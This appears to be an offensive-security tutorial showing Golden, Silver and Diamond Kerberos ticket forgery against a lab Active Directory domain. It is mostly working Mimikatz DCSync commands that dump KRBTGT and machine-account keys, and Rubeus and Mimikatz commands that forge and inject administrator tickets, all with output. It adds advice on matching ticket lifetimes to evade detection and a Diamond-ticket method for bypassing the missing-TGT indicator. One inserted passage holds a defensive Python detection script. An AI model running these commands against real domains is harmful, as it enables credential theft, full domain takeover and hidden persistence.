If an adversary can gain access to NTLM or AES account keys, they can use these values to generate forged Kerberos tickets. Forging Kerberos tickets can be a great way to maintain access to an Active Directory environment.
This article will look at three common methods of doing this: Golden, Silver and Diamond Tickets.
Golden Tickets
An adversary with access to a KRBTGT account hash can generate their own Kerberos tickets for any user in a domain, including administrators. This is known as a Golden Ticket Attack.
In older domains, the forged user did not necessarily need to exist in the domain. However, since KB5008380 the user account targeted does need to exist in the domain.
Rubeus can be used to generate forged Kerberos tickets.
Getting Access to the KRBTGT
First we need to gain access to the KRBTGT account credentials. This account is used by the Kerberos Key Distribution Center (KDC) service, which handles ticket requests and issues Ticket Granting Tickets (TGTs) to users.
We can use Mimikatz to perform a DCSync attack to gain access to the KRBTGT account hash.
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\krbtgt
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 28/04/2024 02:35:48
Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9a1b5b20c1959f4bcaf9f4838eba7472
ntlm- 0: 9a1b5b20c1959f4bcaf9f4838eba7472
lm - 0: 6fba1ef75d362808b3594035721f1955
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7b31ffa11e101561bcf68f2e3df76299
* Primary:Kerberos-Newer-Keys *
Default Salt : BORDERGATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28
aes128_hmac (4096) : 9d15c219d740aa2989b4f71b66af6df9
des_cbc_md5 (4096) : 1cec2c988513b9b9
* Primary:Kerberos *
Default Salt : BORDERGATE.LOCALkrbtgt
Credentials
des_cbc_md5 : 1cec2c988513b9b9
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Creating a Golden Ticket
Next, we need to use PowerView to get the FQDN of the domain and its associated SID:
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-Domain
Forest : bordergate.local
DomainControllers : {DC01.bordergate.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC01.bordergate.local
RidRoleOwner : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name : bordergate.local
PS C:\Tools> Get-DomainSID
S-1-5-21-1220112391-3624315575-3511410581
We can then use Rubeus with the /ptt flag to inject the ticket for the Administrator user into our session, allowing us to access the domain controller's C$ share.
C:\Users\alice>dir \\DC01.bordergate.local\C$
Access is denied.
Rubeus.exe golden /aes256:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /user:Administrator /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Build TGT
[*] Building PAC
[*] Domain : BORDERGATE.LOCAL (BORDERGATE)
[*] SID : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : bordergate.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@bordergate.local'
[*] AuthTime : 29/04/2024 18:05:12
[*] StartTime : 29/04/2024 18:05:12
[*] EndTime : 30/04/2024 01:05:12
[*] RenewTill : 06/05/2024 18:05:12
[*] base64(ticket.kirbi):
[+] Ticket successfully imported!
C:\Tools>dir \\DC01\C$
Volume in drive \\DC01\C$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\DC01\C$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,939,592,704 bytes free
The same attack can be performed using Mimikatz:
mimikatz.exe
mimikatz # kerberos::golden /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User : Administrator
Domain : bordergate.local (BORDERGATE)
SID : S-1-5-21-1220112391-3624315575-3511410581
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
It's possible to detect Golden Ticket attacks by:
- Looking for service ticket requests (TGS) that have no corresponding TGT request. Diamond tickets are a way around this indicator.
- Monitoring for tickets with unusually long lifespans.
To ensure that our ticket lifespan matches what is typical in the target environment, we can first determine the current default policy with PowerView:
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-DomainPolicy | select -expand KerberosPolicy
MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
Based on this information, we can set the following flags in Mimikatz to generate tickets that look normal for the target environment:
/startoffset:0 /endin:600 /renewmax:7
PS C:\Tools> .\mimikatz.exe
mimikatz # kerberos::golden /startoffset:0 /endin:600 /renewmax:7 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User : Administrator
Domain : bordergate.local (BORDERGATE)
SID : S-1-5-21-1220112391-3624315575-3511410581
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
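As an added example (not code from the original post), the following Python script checks the two indicators above on constructed data: it parses the Lifetime line printed by Mimikatz and the StartTime/EndTime/RenewTill lines printed by Rubeus, compares them with the Get-DomainPolicy values, and correlates constructed 4769 (TGS request) events against 4768 (TGT request) events from a domain controller. The event IDs are the standard Windows Security log IDs; the policy units (MaxTicketAge in hours, MaxRenewAge in days) are assumed to be the Windows defaults.

```python
"""Added example: flag the two Golden Ticket indicators on constructed data.
The event records are made up; the Lifetime lines are the ones Mimikatz
printed on this page."""
from datetime import datetime, timedelta

# Kerberos policy as returned by Get-DomainPolicy above. Assumption: the
# Windows default units apply (MaxTicketAge in hours, MaxRenewAge in days).
POLICY = {"MaxTicketAge": 10, "MaxRenewAge": 7}
TS = "%d/%m/%Y %H:%M:%S"  # timestamp format used by both tools on this page


def parse_mimikatz_lifetime(line):
    """'Lifetime : start ; end ; renew' -> (start, end, renew) datetimes."""
    _, _, rest = line.partition(":")
    return tuple(datetime.strptime(p.strip(), TS) for p in rest.split(";"))


def parse_rubeus_times(output):
    """Pull StartTime/EndTime/RenewTill out of a Rubeus 'Build TGT' listing."""
    found = {}
    for line in output.splitlines():
        for key in ("StartTime", "EndTime", "RenewTill"):
            if key in line:
                found[key] = datetime.strptime(line.split(":", 1)[1].strip(), TS)
    return found["StartTime"], found["EndTime"], found["RenewTill"]


def lifetime_violations(start, end, renew, policy=POLICY):
    """Compare a ticket's validity and renewal windows with domain policy."""
    findings = []
    if end - start > timedelta(hours=policy["MaxTicketAge"]):
        findings.append("lifetime exceeds MaxTicketAge")
    if renew - start > timedelta(days=policy["MaxRenewAge"]):
        findings.append("renewal window exceeds MaxRenewAge")
    return findings


def tgs_without_tgt(events, window=timedelta(days=POLICY["MaxRenewAge"])):
    """Return 4769 (TGS request) events for accounts with no 4768 (TGT
    request) in the preceding `window`. Keying on the account name also
    catches a TGT that was requested as one user and rewritten for another."""
    tgt_times = {}
    for ev in events:
        if ev["id"] == 4768:
            tgt_times.setdefault(ev["account"].lower(), []).append(ev["time"])
    flagged = []
    for ev in events:
        if ev["id"] != 4769:
            continue
        earlier = tgt_times.get(ev["account"].lower(), [])
        if not any(ev["time"] - window <= t <= ev["time"] for t in earlier):
            flagged.append(ev)
    return flagged


# Constructed DC security events: alice logs on normally, then a TGS request
# for Administrator appears with no TGT request behind it.
SAMPLE_EVENTS = [
    {"id": 4768, "account": "alice", "time": datetime(2024, 4, 29, 17, 58, 0)},
    {"id": 4769, "account": "alice", "time": datetime(2024, 4, 29, 17, 58, 2)},
    {"id": 4769, "account": "Administrator", "time": datetime(2024, 4, 29, 18, 6, 30)},
]
DEFAULT_LIFETIME = "Lifetime : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13"
TUNED_LIFETIME = "Lifetime : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40"

if __name__ == "__main__":
    print(lifetime_violations(*parse_mimikatz_lifetime(DEFAULT_LIFETIME)))
    print(lifetime_violations(*parse_mimikatz_lifetime(TUNED_LIFETIME)))
    print([e["account"] for e in tgs_without_tgt(SAMPLE_EVENTS)])
```

Run against the page's own output, the ten-year default lifetime trips both policy checks while the tuned ticket trips neither, and the constructed Administrator TGS request is flagged because no TGT request for that account precedes it.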
Silver Tickets
Silver Ticket attacks allow an adversary to forge TGS (Ticket Granting Service) tickets for a specific service. The benefit of this attack over Golden Tickets is that no interaction with a domain controller is required, so it is potentially stealthier.
Getting Access to a Service Account
First we need to extract the service account hash for the domain controller's machine account (dc01$).
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\dc01$" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\dc01$
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\dc01$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : DC01
** SAM ACCOUNT **
SAM Username : DC01$
Account Type : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration :
Password last change : 28/04/2024 18:36:16
Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-1000
Object Relative ID : 1000
Credentials:
Hash NTLM: e04ae9e43f82df634c9e61d09577acb4
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423
aes128_hmac (4096) : ed536a8d7a0daf906314d7387e8d2845
des_cbc_md5 (4096) : eaf1fb629e13c81f
OldCredentials
aes256_hmac (4096) : e7637bed1b981202d5497de82f4931d30b06d70068b40037b9e0acc60a124ed9
aes128_hmac (4096) : 76935fc442752233880f5aa0b23730e3
des_cbc_md5 (4096) : 790e8a4cd9dc0413
* Primary:Kerberos *
Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
Credentials
des_cbc_md5 : eaf1fb629e13c81f
OldCredentials
des_cbc_md5 : 790e8a4cd9dc0413
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Creating a Silver Ticket
With access to the service account hash, we can then use Rubeus to generate a silver ticket to access the CIFS service:
C:\Tools>rubeus.exe silver /service:cifs/dc01.bordergate.local /aes256:80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt /user:dc01$
[*] Action: Build TGS
[*] Building PAC
[*] Domain : BORDERGATE.LOCAL (BORDERGATE)
[*] SID : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : cifs
[*] Target : dc01.bordergate.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'dc01$' to 'cifs/dc01.bordergate.local'
[*] AuthTime : 29/04/2024 18:04:22
[*] StartTime : 29/04/2024 18:04:22
[*] EndTime : 30/04/2024 03:04:22
[*] RenewTill : 06/05/2024 18:04:22
[*] base64(ticket.kirbi):
[+] Ticket successfully imported!
C:\Tools>dir \\dc01.bordergate.local\c$
Volume in drive \\dc01.bordergate.local\c$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\dc01.bordergate.local\c$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,926,878,720 bytes free
Diamond Tickets
Forged Golden and Silver Tickets can be detected because the service ticket requests (TGS) have no corresponding TGT requests.
In a Diamond Ticket attack, an adversary requests a valid TGT from a domain controller. This is then decrypted using the KRBTGT account hash, modified to meet the adversary's requirements and re-encrypted. Since a genuine TGT request takes place, this reduces the chance of detection compared to a Golden Ticket attack.
C:\Tools>dir \\dc01.bordergate.local\C$
Access is denied.
C:\Tools>dir \\dc01\C$
Access is denied.
C:\Tools>Rubeus.exe diamond /krbkey:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bordergate.local /ticketuserid:500 /ptt
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.bordergate.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: t/DPs5uWq4XvahoWh0mK0Uv4hiwa/n5TyR4R7p06d6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
[+] Ticket successfully imported!
C:\Tools>klist
Current LogonId is 0:0x192612
Cached Tickets: (1)
#0> Client: Administrator @ BORDERGATE.LOCAL
Server: krbtgt/BORDERGATE.LOCAL @ BORDERGATE.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 4/30/2024 18:16:45 (local)
End Time: 5/1/2024 1:00:38 (local)
Renew Time: 5/7/2024 18:00:38 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\Tools>dir \\dc01\C$
Volume in drive \\dc01\C$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\dc01\C$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,740,531,200 bytes free
In Conclusion
Diamond Tickets give an attacker the ability to assume the identity of any user in a domain, whilst being more difficult to detect than traditional Golden Ticket attacks. In addition, it's always worth ensuring the tickets being generated blend in with the target environment.